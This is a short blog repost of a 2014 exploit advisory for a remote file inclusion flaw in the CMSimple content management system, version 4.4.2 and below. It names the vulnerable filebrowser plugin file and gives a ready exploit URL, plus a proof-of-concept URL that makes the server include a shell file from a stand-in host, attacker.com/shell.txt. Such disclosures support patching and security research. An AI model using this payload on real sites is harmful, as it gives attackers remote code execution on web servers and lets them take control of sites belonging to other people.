Home vulnerabilities CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

By
Wednesday, April 16, 2014
Read
Add Comment

[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system.

[o] Vulnerable File

plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

[o] Exploit

http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]

[o] PoC

http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us